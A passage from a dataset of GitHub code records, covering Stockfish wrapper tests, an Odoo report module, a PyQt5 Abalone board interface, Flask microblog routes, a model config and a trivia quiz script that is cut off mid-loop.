)\n fen_1 = stockfish.get_fen_position()\n stockfish.make_moves_from_current_position([])\n assert fen_1 == stockfish.get_fen_position()\n\n stockfish.make_moves_from_current_position([\"e1g1\"])\n assert (\n stockfish.get_fen_position()\n == \"r1bqkb1r/pppp1ppp/2n2n2/1B2p3/4P3/5N2/PPPP1PPP/RNBQ1RK1 b kq - 1 1\"\n )\n\n stockfish.make_moves_from_current_position(\n [\"f6e4\", \"d2d4\", \"e4d6\", \"b5c6\", \"d7c6\", \"d4e5\", \"d6f5\"]\n )\n assert (\n stockfish.get_fen_position()\n == \"r1bqkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNBQ1RK1 w kq - 1 5\"\n )\n\n stockfish.make_moves_from_current_position(\n [\"d1d8\", \"e8d8\", \"b1c3\", \"d8e8\", \"f1d1\", \"f5e7\", \"h2h3\", \"f7f5\"]\n )\n assert (\n stockfish.get_fen_position()\n == \"r1b1kb1r/ppp1n1pp/2p5/4Pp2/8/2N2N1P/PPP2PP1/R1BR2K1 w - f6 0 9\"\n )\n\n stockfish.set_fen_position(\n \"r1bqk2r/pppp1ppp/8/8/1b2n3/2N5/PPP2PPP/R1BQK2R w Qkq - 0 1\"\n )\n\n invalid_moves = [\"d1e3\", \"e1g1\", \"c3d5\", \"c1d4\", \"a7a6\", \"e1d2\", \"word\"]\n\n for invalid_move in invalid_moves:\n with pytest.raises(ValueError):\n stockfish.make_moves_from_current_position([invalid_move])\n\n def test_make_moves_transposition_table_speed(self, stockfish):\n \"\"\"\n make_moves_from_current_position won't send the \"ucinewgame\" token to Stockfish, since it\n will reach a new position similar to the current one. Meanwhile, set_fen_position will send this\n token (unless the user specifies otherwise), since it could be going to a completely new position.\n\n A big effect of sending this token is that it resets SF's transposition table. If the\n new position is similar to the current one, this will affect SF's speed. This function tests\n that make_moves_from_current_position doesn't reset the transposition table, by verifying SF is faster in\n evaluating a consecutive set of positions when the make_moves_from_current_position function is used.\n \"\"\"\n\n stockfish.set_depth(16)\n positions_considered = []\n stockfish.set_fen_position(\n \"rnbqkbnr/ppp1pppp/8/3p4/2PP4/8/PP2PPPP/RNBQKBNR b KQkq - 0 2\"\n )\n\n total_time_calculating_first = 0.0\n for i in range(5):\n start = default_timer()\n chosen_move = stockfish.get_best_move()\n total_time_calculating_first += default_timer() - start\n positions_considered.append(stockfish.get_fen_position())\n stockfish.make_moves_from_current_position([chosen_move])\n\n total_time_calculating_second = 0.0\n for i in range(len(positions_considered)):\n stockfish.set_fen_position(positions_considered[i])\n start = default_timer()\n stockfish.get_best_move()\n total_time_calculating_second += default_timer() - start\n\n assert total_time_calculating_first < total_time_calculating_second\n\n def test_get_wdl_stats(self, stockfish):\n stockfish.set_depth(15)\n stockfish._set_option(\"MultiPV\", 2)\n if stockfish.does_current_engine_version_have_wdl_option():\n stockfish.get_wdl_stats() # Testing that this doesn't raise a RuntimeError.\n stockfish.set_fen_position(\"7k/4R3/4P1pp/7N/8/8/1q5q/3K4 w - - 0 1\")\n wdl_stats = stockfish.get_wdl_stats()\n assert wdl_stats[1] > wdl_stats[0] * 7\n assert abs(wdl_stats[0] - wdl_stats[2]) / wdl_stats[0] < 0.1\n\n stockfish.set_fen_position(\n \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\"\n )\n wdl_stats_2 = stockfish.get_wdl_stats()\n assert wdl_stats_2[1] > wdl_stats_2[0] * 3.5\n assert wdl_stats_2[0] > wdl_stats_2[2] * 1.8\n\n stockfish.set_fen_position(\"8/8/8/8/8/6k1/6p1/6K1 w - - 0 1\")\n assert stockfish.get_wdl_stats() is None\n\n stockfish.set_fen_position(\n \"rnbqkb1r/pp3ppp/3p1n2/1B2p3/3NP3/2N5/PPP2PPP/R1BQK2R b KQkq - 0 6\"\n )\n assert len(stockfish.get_wdl_stats()) == 3\n\n stockfish.set_fen_position(\"8/8/8/8/8/3k4/3p4/3K4 w - - 0 1\")\n assert stockfish.get_wdl_stats() is None\n else:\n with pytest.raises(RuntimeError):\n stockfish.get_wdl_stats()\n\n def test_does_current_engine_version_have_wdl_option(self, stockfish):\n if stockfish.get_stockfish_major_version() <= 11:\n assert not stockfish.does_current_engine_version_have_wdl_option()\n with pytest.raises(RuntimeError):\n stockfish.get_wdl_stats()\n\n def test_benchmark_result_with_defaults(self, stockfish):\n params = stockfish.BenchmarkParameters()\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_valid_options(self, stockfish):\n params = stockfish.BenchmarkParameters(\n ttSize=64, threads=2, limit=1000, limitType=\"movetime\", evalType=\"classical\"\n )\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_invalid_options(self, stockfish):\n params = stockfish.BenchmarkParameters(\n ttSize=2049,\n threads=0,\n limit=0,\n fenFile=\"./fakefile.fen\",\n limitType=\"fghthtr\",\n evalType=\"\",\n )\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_benchmark_result_with_invalid_type(self, stockfish):\n params = {\n \"ttSize\": 16,\n \"threads\": 1,\n \"limit\": 13,\n \"fenFile\": \"./fakefile.fen\",\n \"limitType\": \"depth\",\n \"evalType\": \"mixed\",\n }\n result = stockfish.benchmark(params)\n # result should contain the last line of a successful method call\n assert result.split(\" \")[0] == \"Nodes/second\"\n\n def test_multiple_calls_to_del(self, stockfish):\n assert stockfish._stockfish.poll() is None\n assert not stockfish._has_quit_command_been_sent\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n\n def test_multiple_quit_commands(self, stockfish):\n # Test multiple quit commands, and include a call to del too. All of\n # them should run without causing some Exception.\n assert stockfish._stockfish.poll() is None\n assert not stockfish._has_quit_command_been_sent\n stockfish._put(\"quit\")\n assert stockfish._has_quit_command_been_sent\n stockfish._put(\"quit\")\n assert stockfish._has_quit_command_been_sent\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n stockfish._put(f\"go depth {10}\")\n # Should do nothing, and change neither of the values below.\n assert stockfish._stockfish.poll() is not None\n assert stockfish._has_quit_command_been_sent\n\n def test_what_is_on_square(self, stockfish):\n stockfish.set_fen_position(\n \"rnbq1rk1/ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n )\n assert stockfish.get_what_is_on_square(\"a1\") is Stockfish.Piece.WHITE_ROOK\n assert stockfish.get_what_is_on_square(\"a8\") is Stockfish.Piece.BLACK_ROOK\n assert stockfish.get_what_is_on_square(\"g8\") is Stockfish.Piece.BLACK_KING\n assert stockfish.get_what_is_on_square(\"e1\") is Stockfish.Piece.WHITE_KING\n assert stockfish.get_what_is_on_square(\"h2\") is Stockfish.Piece.WHITE_PAWN\n assert stockfish.get_what_is_on_square(\"f8\") is Stockfish.Piece.BLACK_ROOK\n assert stockfish.get_what_is_on_square(\"d6\") is None\n assert stockfish.get_what_is_on_square(\"h7\") is Stockfish.Piece.BLACK_PAWN\n assert stockfish.get_what_is_on_square(\"c3\") is Stockfish.Piece.WHITE_KNIGHT\n assert stockfish.get_what_is_on_square(\"a3\") is Stockfish.Piece.WHITE_BISHOP\n assert stockfish.get_what_is_on_square(\"h8\") is None\n assert stockfish.get_what_is_on_square(\"d1\") is Stockfish.Piece.WHITE_QUEEN\n assert stockfish.get_what_is_on_square(\"d4\") is None\n assert stockfish.get_what_is_on_square(\"f6\") is Stockfish.Piece.BLACK_KNIGHT\n assert stockfish.get_what_is_on_square(\"g7\") is Stockfish.Piece.BLACK_BISHOP\n assert stockfish.get_what_is_on_square(\"d8\") is Stockfish.Piece.BLACK_QUEEN\n with pytest.raises(ValueError):\n stockfish.get_what_is_on_square(\"i1\")\n with pytest.raises(ValueError):\n stockfish.get_what_is_on_square(\"b9\")\n\n def test_13_return_values_from_what_is_on_square(self, stockfish):\n stockfish.set_fen_position(\n \"rnbq1rk1/ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n )\n expected_enum_members = [\n \"WHITE_PAWN\",\n \"BLACK_PAWN\",\n \"WHITE_KNIGHT\",\n \"BLACK_KNIGHT\",\n \"WHITE_BISHOP\",\n \"BLACK_BISHOP\",\n \"WHITE_ROOK\",\n \"BLACK_ROOK\",\n \"WHITE_QUEEN\",\n \"BLACK_QUEEN\",\n \"WHITE_KING\",\n \"BLACK_KING\",\n ]\n rows = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\"]\n cols = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\"]\n for row in rows:\n for col in cols:\n val = stockfish.get_what_is_on_square(row + col)\n assert val == None or val.name in expected_enum_members\n\n def test_will_move_be_a_capture(self, stockfish):\n stockfish.set_fen_position(\n \"1nbq1rk1/Ppp1ppbp/5np1/3pP3/8/BPN5/P1PP1PPP/R2QKBNR w KQ d6 0 6\"\n )\n c3d5_result = stockfish.will_move_be_a_capture(\"c3d5\")\n assert (\n c3d5_result is Stockfish.Capture.DIRECT_CAPTURE\n and c3d5_result.name == \"DIRECT_CAPTURE\"\n and c3d5_result.value == \"direct capture\"\n )\n e5d6_result = stockfish.will_move_be_a_capture(\"e5d6\")\n assert (\n e5d6_result is Stockfish.Capture.EN_PASSANT\n and e5d6_result.name == \"EN_PASSANT\"\n and e5d6_result.value == \"en passant\"\n )\n f1e2_result = stockfish.will_move_be_a_capture(\"f1e2\")\n assert (\n f1e2_result is Stockfish.Capture.NO_CAPTURE\n and f1e2_result.name == \"NO_CAPTURE\"\n and f1e2_result.value == \"no capture\"\n )\n e5f6_result = stockfish.will_move_be_a_capture(\"e5f6\")\n assert (\n e5f6_result is Stockfish.Capture.DIRECT_CAPTURE\n and e5f6_result.name == \"DIRECT_CAPTURE\"\n and e5f6_result.value == \"direct capture\"\n )\n a3d6_result = stockfish.will_move_be_a_capture(\"a3d6\")\n assert (\n a3d6_result is Stockfish.Capture.NO_CAPTURE\n and a3d6_result.name == \"NO_CAPTURE\"\n and a3d6_result.value == \"no capture\"\n )\n a7a8q_result = stockfish.will_move_be_a_capture(\"a7a8q\")\n assert (\n a7a8q_result is Stockfish.Capture.NO_CAPTURE\n and a7a8q_result.name == \"NO_CAPTURE\"\n and a7a8q_result.value == \"no capture\"\n )\n a7a8b_result = stockfish.will_move_be_a_capture(\"a7a8b\")\n assert (\n a7a8b_result is Stockfish.Capture.NO_CAPTURE\n and a7a8b_result.name == \"NO_CAPTURE\"\n and a7a8b_result.value == \"no capture\"\n )\n a7b8q_result = stockfish.will_move_be_a_capture(\"a7b8q\")\n assert (\n a7b8q_result is Stockfish.Capture.DIRECT_CAPTURE\n and a7b8q_result.name == \"DIRECT_CAPTURE\"\n and a7b8q_result.value == \"direct capture\"\n )\n a7b8r_result = stockfish.will_move_be_a_capture(\"a7b8r\")\n assert (\n a7b8r_result is Stockfish.Capture.DIRECT_CAPTURE\n and a7b8r_result.name == \"DIRECT_CAPTURE\"\n and a7b8r_result.value == \"direct capture\"\n )\n\n with pytest.raises(ValueError):\n stockfish.will_move_be_a_capture(\"c3c5\")\n\n @pytest.mark.parametrize(\n \"fen\",\n [\n \"2k2q2/8/8/8/8/8/8/2Q2K2 w - - 0 1\",\n \"8/8/8/3k4/3K4/8/8/8 b - - 0 1\",\n \"1q2nB2/pP1k2KP/NN1Q1qP1/8/1P1p4/4p1br/3R4/6n1 w - - 0 1\",\n \"3rk1n1/ppp3pp/8/8/8/8/PPP5/1KR1R3 w - - 0 1\",\n ],\n )\n def test_invalid_fen_king_attacked(self, stockfish, fen):\n # Each of these FENs have correct syntax, but\n # involve a king being attacked while it's the opponent's turn.\n old_del_counter = Stockfish._del_counter\n assert Stockfish._is_fen_syntax_valid(fen)\n if (\n fen == \"8/8/8/3k4/3K4/8/8/8 b - - 0 1\"\n and stockfish.get_stockfish_major_version() >= 15\n ):\n # Since for that FEN, SF 15 actually outputs a best move without crashing (unlike SF 14 and earlier).\n return\n assert not stockfish.is_fen_valid(fen)\n assert Stockfish._del_counter == old_del_counter + 2\n\n stockfish.set_fen_position(fen)\n with pytest.raises(StockfishException):\n stockfish.get_evaluation()\n\n def test_is_fen_valid(self, stockfish):\n old_params = stockfish.get_parameters()\n old_info = stockfish.info\n old_depth = stockfish.depth\n old_fen = stockfish.get_fen_position()\n correct_fens = [\n \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\",\n \"r1bQkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNB2RK1 b kq - 0 8\",\n \"4k3/8/4K3/8/8/8/8/8 w - - 10 50\",\n \"r1b1kb1r/ppp2ppp/3q4/8/P2Q4/8/1PP2PPP/RNB2RK1 w kq - 8 15\",\n ]\n invalid_syntax_fens = [\n \"r1bQkb1r/ppp2ppp/2p5/4Pn2/8/5N2/PPP2PPP/RNB2RK b kq - 0 8\",\n \"rnbqkb1r/pppp1ppp/4pn2/8/2PP4/8/PP2PPPP/RNBQKBNR w KQkq - 3\",\n \"rn1q1rk1/pbppbppp/1p2pn2/8/2PP4/5NP1/PP2PPBP/RNBQ1RK1 w w - 5 7\",\n \"4k3/8/4K3/71/8/8/8/8 w - - 10 50\",\n ]\n for correct_fen, invalid_syntax_fen in zip(correct_fens, invalid_syntax_fens):\n old_del_counter = Stockfish._del_counter\n assert stockfish.is_fen_valid(correct_fen)\n assert not stockfish.is_fen_valid(invalid_syntax_fen)\n assert stockfish._is_fen_syntax_valid(correct_fen)\n assert not stockfish._is_fen_syntax_valid(invalid_syntax_fen)\n assert Stockfish._del_counter == old_del_counter + 2\n\n time.sleep(2.0)\n assert stockfish._stockfish.poll() is None\n assert stockfish.get_parameters() == old_params\n assert stockfish.info == old_info\n assert stockfish.depth == old_depth\n assert stockfish.get_fen_position() == old_fen\n\n def test_send_quit_command(self, stockfish):\n assert stockfish._stockfish.poll() is None\n old_del_counter = Stockfish._del_counter\n stockfish.send_quit_command()\n assert stockfish._stockfish.poll() is not None\n stockfish.__del__()\n assert stockfish._stockfish.poll() is not None\n assert Stockfish._del_counter == old_del_counter + 1\n","repo_name":"zhelyabuzhsky/stockfish","sub_path":"tests/stockfish/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":40357,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"37"} +{"seq_id":"4091388665","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass RequestMaterialQweb(models.Model):\n _inherit = 'izi.service.card.using'\n\n @api.multi\n def action_print(self):\n return {\n 'type': 'ir.actions.act_url',\n 'url': 'report/pdf/report_qweb.report_template_request_material_view/%s' %(self.id),\n 'target': 'new',\n 'res_id': self.id,\n }\n\n def _name_qweb(self):\n user_id = self.env['res.users'].search([('id', '=', self.env.uid)], limit=1)\n return user_id.name\n\n def _get_name_employee(self,line_id):\n line = self.env['izi.service.card.using.line'].search([('id','=',line_id)])\n name = ''\n for emp in line.employee_ids:\n name = name + ',' + emp.name\n return name[1:]\n\n","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/report_qweb/models/request_material.py","file_name":"request_material.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4595268795","text":"from monad.IterableMonad import TupleMonad\n\n\nf = lambda a: TupleMonad((a-1, a, a+1))\ng = lambda a: TupleMonad((a, -a))\n# left identity\na = 2\nlhs = TupleMonad((a,)).flat_map(f)\nrhs = f(a)\nprint(lhs == rhs)\n\n# right identity\nlhs=TupleMonad((a,)).flat_map(lambda x: TupleMonad((x,)))\nrhs=TupleMonad((a,))\nprint(lhs == rhs)\n\n# associativity\nm = TupleMonad((1, 2))\nlhs = m.flat_map(f).flat_map(g)\nrhs = m.flat_map(lambda x: f(x).flat_map(g))\nprint(lhs == rhs)\n\n","repo_name":"michaelw123/IterableMonad","sub_path":"tests/tuple_monad_test.py","file_name":"tuple_monad_test.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1494247395","text":"from multiprocessing import Queue\nfrom typing import Callable\n\nimport numpy as np\nfrom PyQt5.QtCore import QSize, Qt, QTimer\nfrom PyQt5.QtGui import QColor, QPaintEvent, QPainter, QPen, QBrush, QMouseEvent\nfrom PyQt5.QtWidgets import QDesktopWidget, QWidget, QMainWindow, QHBoxLayout, QVBoxLayout\n\nfrom abalone import AbaloneModel\nfrom abalone.StoneColor import StoneColor\nfrom graphics.QSyncManager import SyncType, iteration_queue, SyncClick\n\nOUTLINE_COLOR = {\n \"NORMAL\": QColor(\"#212121\"),\n \"SUCCESS_SELECT\": QColor(\"#00C853\"),\n \"FAIL_SELECT\": QColor(\"#D50000\")\n}\n\nCELL_COLOR = {StoneColor.BLACK: QColor(\"#263238\"),\n StoneColor.WHITE: QColor(\"#CFD8DC\")}\n\n\nclass _Qt5AbaloneCell(QWidget):\n\n def __init__(self, block_size: int,\n click_handler: Callable[[], bool]):\n # noinspection PyArgumentList\n super(_Qt5AbaloneCell, self).__init__()\n\n self.block_size = block_size\n self.click_handler = click_handler\n\n self.out_line_size = block_size // 15\n self.cell_color = StoneColor.NONE\n self.selected = False\n\n self._init_cell()\n\n def _init_cell(self):\n self.setFixedSize(QSize(self.block_size, self.block_size))\n self.update()\n\n # event handle\n\n def paintEvent(self, q_paint_event: QPaintEvent):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing)\n\n if self.cell_color != StoneColor.NONE:\n painter.setBrush(QBrush(CELL_COLOR[self.cell_color], Qt.SolidPattern))\n\n painter.setPen(QPen(OUTLINE_COLOR[\"SUCCESS_SELECT\"] if self.selected else OUTLINE_COLOR[\"NORMAL\"],\n self.out_line_size, Qt.SolidLine))\n painter.drawEllipse(self.out_line_size, self.out_line_size,\n self.block_size - self.out_line_size * 2, self.block_size - self.out_line_size * 2)\n\n def mouseReleaseEvent(self, q_mouse_event: QMouseEvent):\n if q_mouse_event.button() == Qt.LeftButton:\n self.click_handler()\n\n # cell control\n\n def reset_cell(self) -> None:\n self.cell_color = StoneColor.NONE\n self.selected = False\n self.update()\n\n def set_color(self, color: StoneColor = StoneColor.NONE) -> None:\n if self.cell_color != color:\n self.cell_color = color\n self.update()\n\n def set_select(self, selected: bool = True) -> None:\n if not (self.cell_color == StoneColor.NONE and not self.selected or self.selected == selected):\n self.selected = selected\n self.update()\n\n\nclass Qt5UserInterfaceAgent(QMainWindow):\n\n # noinspection PyArgumentList\n def __init__(self,\n sync_queue: Queue,\n fps: int = 60,\n disable_click_interface: bool = True,\n ui_pipe: Queue = None,\n block_size: int = 50):\n super(Qt5UserInterfaceAgent, self).__init__()\n self.sync_queue = sync_queue\n self.fps = fps\n self.disable_click_interface = disable_click_interface\n self.ui_pipe = ui_pipe\n self.block_size = block_size\n\n init_data = sync_queue.get()\n\n self.edge_size = init_data.game_vector[0]\n\n self._abalone_cell = list()\n self._timer = None\n self._prv_board_hash = None\n self._get_1d_pos, _ = AbaloneModel.build_pos_method(self.edge_size)\n\n self._wait_ui_response = False\n\n self._init_ui()\n self.update_board(init_data.game_vector)\n self._init_timer()\n\n # init ui\n\n # noinspection PyArgumentList\n def _init_ui(self) -> None:\n self.setWindowTitle(\"AbaloneRL Qt5 \"\n + (\"Visualizer\" if self.disable_click_interface else \"Graphic User Interface\"))\n self.statusBar().showMessage(\"AbaloneRL, Ready\")\n\n self.setAutoFillBackground(True)\n palette = self.palette()\n palette.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(palette)\n\n center_weight = QWidget()\n horizon_layout = QHBoxLayout()\n\n board_layout = QVBoxLayout()\n board_layout.setSpacing(0)\n board_layout.setContentsMargins(*[self.block_size // 4] * 4)\n\n self._init_abalone_board(board_layout)\n\n horizon_layout.addLayout(board_layout)\n\n center_weight.setLayout(horizon_layout)\n self.setCentralWidget(center_weight)\n\n qr = self.frameGeometry()\n qr.moveCenter(QDesktopWidget().availableGeometry().center())\n self.move(qr.topLeft())\n\n self.show()\n\n # noinspection PyArgumentList\n def _init_abalone_board(self, board_layout: QVBoxLayout) -> None:\n # noinspection PyShadowingNames\n def next_layout(y: int) -> QHBoxLayout:\n new_layout = QHBoxLayout()\n new_layout.setAlignment(Qt.AlignLeft)\n new_layout.addSpacing((self.edge_size - y - 1 if y < self.edge_size else y - self.edge_size + 1)\n * (self.block_size + self.block_size // 5) / 2)\n new_layout.setSpacing(self.block_size // 5)\n return new_layout\n\n def build_on_click_cell(fy: int, fx: int) -> Callable[[], bool]:\n def on_click_cell() -> bool:\n self.ui_pipe.put(SyncClick(fy, fx))\n return True\n\n return on_click_cell\n\n prv_layout, prv_y = next_layout(0), 0\n for idx, y, x in AbaloneModel.pos_iterator(self.edge_size):\n if prv_y != y:\n board_layout.addLayout(prv_layout)\n prv_layout, prv_y = next_layout(y), y\n\n cell = _Qt5AbaloneCell(self.block_size, build_on_click_cell(y, x))\n prv_layout.addWidget(cell)\n self._abalone_cell.append(cell)\n board_layout.addLayout(prv_layout)\n\n # noinspection PyUnresolvedReferences\n def _init_timer(self) -> None:\n self._timer = QTimer()\n self._timer.timeout.connect(self._timer_tick)\n self._timer.start(100 // self.fps)\n\n # qt5 ui\n\n def update_board(self, game_vector: np.ndarray) -> None:\n self.update_status_bar(game_vector)\n\n def update(cell, index):\n cell.set_color(StoneColor(game_vector[index + 5]))\n cell.set_select(False)\n\n self._seq_iteration_board(lambda cell, index: update(cell, index))\n\n def update_status_bar(self, game_vector: np.ndarray):\n self.statusBar().showMessage(\"Turns: {0}; Drop Black: {1}; Drop White: {2}; Current Color: {3}\"\n .format(game_vector[1], game_vector[3], game_vector[4],\n \"BLACK\" if game_vector[2] == StoneColor.BLACK else\n (\"WHITE\" if game_vector[2] == StoneColor.WHITE else \"NONE\")))\n\n # board control ui\n\n def reset_board(self) -> None:\n self._iteration_board(lambda cell: cell.reset_cell())\n\n # bin ui control\n\n def _iteration_board(self, f: Callable[[_Qt5AbaloneCell], None]) -> None:\n for cell in self._abalone_cell:\n f(cell)\n\n def _seq_iteration_board(self, f: Callable[[_Qt5AbaloneCell, int], None]) -> None:\n for index in range(len(self._abalone_cell)):\n f(self._abalone_cell[index], index)\n\n def _detect_diff_board(self, game_vector: np.ndarray) -> bool:\n board_hash = hash(game_vector.__str__())\n if self._prv_board_hash == board_hash:\n return False\n else:\n self._prv_board_hash = board_hash\n return True\n\n # user click-interface\n\n def _timer_tick(self) -> None:\n for queue in iteration_queue(self.sync_queue):\n if queue.sync_type == SyncType.SYNC_DRAW and self._detect_diff_board(queue.game_vector):\n self.update_board(queue.game_vector)\n elif queue.sync_type == SyncType.SYNC_KILL:\n exit()\n elif queue.sync_type == SyncType.SYNC_SELECT:\n self._abalone_cell[self._get_1d_pos(queue.y, queue.x)].set_select(queue.selected)\n\n def _send_ui_request(self) -> None:\n pass\n","repo_name":"junghyun397/AbaloneRL","sub_path":"graphics/qt5/Qt5UserInterfaceAgent.py","file_name":"Qt5UserInterfaceAgent.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32401236496","text":"from models.weibo import Weibo\n\nfrom routes import *\n\n\nmain = Blueprint('weibo', __name__)\n\nModel = Weibo\n\n\n@main.route('/')\ndef all():\n user = curr_user()\n models = Model.all()\n print(\"当前登录用户:\", user)\n return render_template('weibo/weibos.html', curr_user=user, models=models)\n\n\n@main.route('/index/')\ndef index(id):\n model = Model.query.get(id)\n comments = model.comments\n user = model.user\n return render_template('weibo/index.html', weibo=model, comments=comments, user=user)\n\n\n@main.route('/edit/')\ndef edit(id):\n m = Model.query.get(id)\n return render_template('weibo/edit.html', model=m)\n\n\n@main.route('/add', methods=['POST'])\n@login_required\ndef add():\n form = request.form\n user = curr_user()\n model = Model.new(form)\n model.user_id = user.id\n model.save()\n return redirect(url_for('weibo.all'))\n\n\n@main.route('/update/', methods=['POST'])\n@login_required\ndef update(id):\n form = request.form\n Model.update(id, form)\n model = Model.query.get(id)\n model.updated_time = int(time.time())\n model.save()\n return redirect(url_for('user.index'))\n\n\n@main.route('/delete/')\n@login_required\ndef delete(id):\n Model.delete(id)\n return redirect(url_for('user.index'))\n","repo_name":"IrisCSX/Weibo","sub_path":"routes/weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70353116906","text":"import tokenizers\n\n\n# Paths\nTOKENIZER_PATH = '../xlnet_tokenizer'\nTRAINING_FILE = '../data/train_folds.csv'\nTEST_FILE = '../data/test.csv'\nSUB_FILE = '../data/sample_submission.csv'\nMODEL_SAVE_PATH = './model_save'\nTRAINED_MODEL_PATH = './model_save'\n\n# Model config\nMODEL_CONFIG = 'xlnet-base-cased'\n\n# Model params\nSEED = 25\nN_FOLDS = 5\nEPOCHS = 4\nLEARNING_RATE = 4e-5\nPATIENCE = None\nEARLY_STOPPING_DELTA = None\nTRAIN_BATCH_SIZE = 32\nVALID_BATCH_SIZE = 32\nMAX_LEN = 128 # actually = 86\nHIDDEN_SIZE = 768\nN_LAST_HIDDEN = 12\nHIGH_DROPOUT = 0.5\nSOFT_ALPHA = 0.6\nWARMUP_RATIO = 0.25\nWEIGHT_DECAY = 0.001\nUSE_SWA = False\nSWA_RATIO = 0.9\nSWA_FREQ = 30\n","repo_name":"heartkilla/kaggle_tweet","sub_path":"src/1st_level/xlnet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"31087771301","text":"num = []\r\nwhile True:\r\n num.append(int(input('Digite um valor: ')))\r\n resp = str(input('Deseja continuar? [s/n]')).strip().lower()\r\n if resp in 'Nn':\r\n break\r\nprint(f'Foram colocados na lista {len(num)} números.')\r\nif 5 in num:\r\n print(f'O número 5 foi digitado na posição {num.index(5)}.')\r\nelse:\r\n print('O número 5 não foi digitado.')\r\nprint('A lista em ordem decrescente é: ', end='')\r\nnum.sort(reverse=True)\r\nprint(num)\r\n","repo_name":"luisasm08/Codigos_python","sub_path":"listas.2.py","file_name":"listas.2.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15636244587","text":"import html\nimport random\nimport requests\n\nURL = \"https://opentdb.com/api.php?amount=10&category=11&difficulty=easy\"\nBASE_URL = \"https://opentdb.com/api.php?\"\n\nCATEGORIES = {\n 9: \"General Knowledge\",\n 10: \"Entertainment- Books\",\n 11: \"Entertainment- Film\",\n 12: \"Entertainment- Music\",\n 13: \"Entertainment- Musicals & Theater\",\n 14: \"Entertainment- Television\",\n 15: \"Entertainment- Video Games\",\n 16: \"Entertainment- Board Games\",\n 17: \"Science- Nature\",\n 18: \"Science- Computers\",\n 19: \"Science- Mathematics\",\n 20: \"Mythology\",\n 21: \"Sports\",\n 22: \"Geography\",\n 23: \"History\",\n 24: \"Politics\",\n 25: \"Art\",\n 26: \"Celebrities\",\n 27: \"Animals\",\n 28: \"Vehicles\",\n 29: \"Entertainment- Comics\",\n 30: \"Science- Gadgets\",\n 31: \"Entertainment- - Japanese Anime & Manga\",\n 32: \"Entertainment- - Cartoon Animations\",\n}\nQUESTION_TYPES = [\"any\", \"multiple\", \"boolean\"]\nDIFFICULTIES = [\"easy\", \"medium\", \"hard\"]\n\n\ndef main():\n print(\"\")\n\n # Select Category\n for category_id, category in CATEGORIES.items():\n print(f\"{category_id}. {category}\")\n\n selected_category = input(\"\\nPlease select a category:\\n> \")\n\n # Select Types of Question\n print(\"\")\n for category_id, question in enumerate(QUESTION_TYPES):\n print(f\"{category_id+1}. {question}\")\n\n selected_type = input(\"\\nPlease select a question type:\\n> \")\n api_type = QUESTION_TYPES[int(selected_type) - 1]\n\n # Select Question Difficulty Level\n print(\"\")\n for category_id, difficulty in enumerate(DIFFICULTIES):\n print(f\"{category_id+1}. {difficulty}\")\n\n selected_difficulty = input(\"\\nPlease select a difficulty:\\n> \")\n api_difficulty = DIFFICULTIES[int(selected_difficulty) - 1]\n\n # Select the number of questioins\n print(\"\")\n selected_quantity = input(\"\\nHow many questions do you want:\\n> \")\n api_quantity = int(selected_quantity)\n\n # Add or remove api_type if \"any\" option was selected\n final_api_type = \"\"\n if api_type == \"any\":\n final_api_type = \"\"\n else:\n final_api_type = f\"&type={api_type}\"\n\n # Generate base URL\n url = (\n BASE_URL\n + f\"amount={api_quantity}&category={selected_category}&difficulty={api_difficulty}{final_api_type}\"\n )\n\n res = requests.get(url, timeout=5)\n data = res.json()\n\n questions = data[\"results\"]\n total_questions: int = len(questions)\n\n # If no questions received, exit the program\n if not total_questions:\n print(\n \"\\n Sorry! Nothing found for selected combination. Please try again with different combinatinon or lower number of questions.\"\n )\n return\n\n # keep track of correctly answerd questions\n answered_correctly: int = 0\n question_num: int = 1\n\n for question in questions:\n correct_answer = html.unescape(question[\"correct_answer\"].strip())\n\n options: list[str] = [\n html.unescape(ans).strip() for ans in question[\"incorrect_answers\"]\n ]\n\n options.append(correct_answer)\n random.shuffle(options) # shuffle the answers\n\n # List 